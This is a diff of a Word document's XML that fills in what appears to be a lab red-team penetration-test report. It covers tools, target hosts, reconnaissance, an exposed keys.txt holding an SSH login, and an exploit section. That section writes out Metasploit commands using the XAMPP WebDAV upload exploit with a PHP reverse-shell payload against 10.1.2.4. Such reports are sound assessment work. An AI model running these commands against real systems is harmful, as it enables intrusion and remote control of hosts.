       </w:pPr>
       <w:r>
-        <w:t>Link</w:t>
+        <w:t>https://www.metasploit.com/</w:t>
       </w:r>
       <w:r>
         <w:tab/>
@@ -2931,9 +3835,130 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>Description</w:t>
-      </w:r>
+        <w:t>Provides known exploits and security vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Directory Buster</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>https://www.kali.org/tools/dirbuster/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Brute forces directories from a wordlist</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hydra</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>https://www.kali.org/tools/hydra/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Brute forces passwords off wordlist.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2946,11 +3971,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc67660179"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc100619271"/>
       <w:r>
         <w:t>Red Team Operations Assessment</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2959,7 +3984,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>&lt;Enter an introductory paragraph here. This sections below is where you detail everything worth discussion from the project&gt;</w:t>
+        <w:t xml:space="preserve">We assess that the infrastructure has critical vulnerabilities and were able to access all machines through vulnerability chaining. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2969,11 +3994,12 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc67660180"/>
-      <w:r>
+      <w:bookmarkStart w:id="28" w:name="_Toc100619272"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Reconnaissance</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2982,72 +4008,191 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Describe Pen test </w:t>
-      </w:r>
-      <w:r>
-        <w:t>starting point&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>Starting Points</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>&lt;reconnaissance investigations&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>The Debian server in the DMZ (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DMZIServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> | 10.1.0.7)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;findings</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Any </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">major </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Finding</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (if any</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> should be Copied to the Significant Vulnerability Details Section of this report</w:t>
-      </w:r>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A web Application Server in the DMZ (Debianx64DMZOnCloudNew | 10.1.0.12)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
+      <w:r>
+        <w:t>The Internal Network Device (employee workstation) in the MZ (Win-10 | 10.1.2.4)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>A public web server "Learn About Security" (Learnaboutsecurity.com)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">econnaissance </w:t>
+      </w:r>
+      <w:r>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:t>nvestigations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Host: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Fastly</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, GitHub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>Email Provider</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: No MX Records</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>Content Management System</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: WordPress</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>Software and Services</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: CRON, ATOM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Findings:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>None Significant</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_vn1si0u5ox89" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkStart w:id="29" w:name="_vn1si0u5ox89" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3056,11 +4201,11 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc67660181"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc100619273"/>
       <w:r>
         <w:t>Scanning</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3069,7 +4214,7 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;version scanning&gt; </w:t>
+        <w:t>Version Scanning</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3079,13 +4224,45 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:t>&lt;vulnerability investigations</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and research findings</w:t>
-      </w:r>
-      <w:r>
-        <w:t>&gt;</w:t>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63EFE861" wp14:editId="1291C851">
+            <wp:extent cx="6316406" cy="6057900"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:docPr id="16" name="Picture 16" descr="NMAP with versions"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="16" name="Picture 16" descr="NMAP with versions"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332434" cy="6073272"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -3093,18 +4270,18 @@
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">&lt;findings: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Any major Finding (if any should be Copied to the Significant Vulnerability Details Section of this report</w:t>
-      </w:r>
-      <w:r>
-        <w:t>&gt;</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ulnerability </w:t>
+      </w:r>
+      <w:r>
+        <w:t>In</w:t>
+      </w:r>
+      <w:r>
+        <w:t>vestigations</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3120,73 +4297,512 @@
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc67660182"/>
-      <w:r>
-        <w:t>Exploit Development</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="27"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Successful exploits to gain access/ exfiltrate sensitive data</w:t>
-      </w:r>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Exploit commands</w:t>
-      </w:r>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;Vulnerable software exploitation”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;Weak Password Cracks&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;findings: Any major Finding (if any should be Copied to the Significant Vulnerability Details Section of this report&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+      <w:r>
+        <w:t>The directory buster revealed the following keys file:</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
           <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
         </w:pBdr>
       </w:pPr>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B51209E" wp14:editId="420DC799">
+            <wp:extent cx="1856839" cy="1114425"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="17" name="Picture 17" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="17" name="Picture 17" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId12"/>
+                    <a:srcRect b="24710"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1860851" cy="1116833"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t>Findings:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78563B28" wp14:editId="1F28675E">
+            <wp:extent cx="6191250" cy="3609975"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="18" name="Picture 18" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18" name="Picture 18" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6191250" cy="3609975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The keys.txt file holds the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> login.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
+        </w:pBdr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_z1i274yoj4um" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc100619274"/>
+      <w:r>
+        <w:t>Exploit Development</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="31"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Successful exploits to gain access/exfiltrate sensitive data</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504E0493" wp14:editId="5C124CFF">
+            <wp:extent cx="6153150" cy="1762125"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="19" name="Picture 19" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="19" name="Picture 19" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6153150" cy="1762125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:r>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ommands</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D0FC425" wp14:editId="2B3126CC">
+            <wp:extent cx="6858000" cy="5993765"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="20" name="Picture 20" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="20" name="Picture 20" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="5993765"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>use exploit/windows/http/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xampp_webdav_upload_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set RHOSTS 10.1.2.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>set payload php/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>run</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Vulnerable </w:t>
+      </w:r>
+      <w:r>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">oftware </w:t>
+      </w:r>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:t>xploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3485D996" wp14:editId="79882E49">
+            <wp:extent cx="6858000" cy="4749165"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="22" name="Picture 22" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="22" name="Picture 22" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6858000" cy="4749165"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.exploit-db.com/exploits/18367</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Weak Password Cracks</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B204F5" wp14:editId="4E288C6B">
+            <wp:extent cx="6858000" cy="2540000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="23" name="Picture 23" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
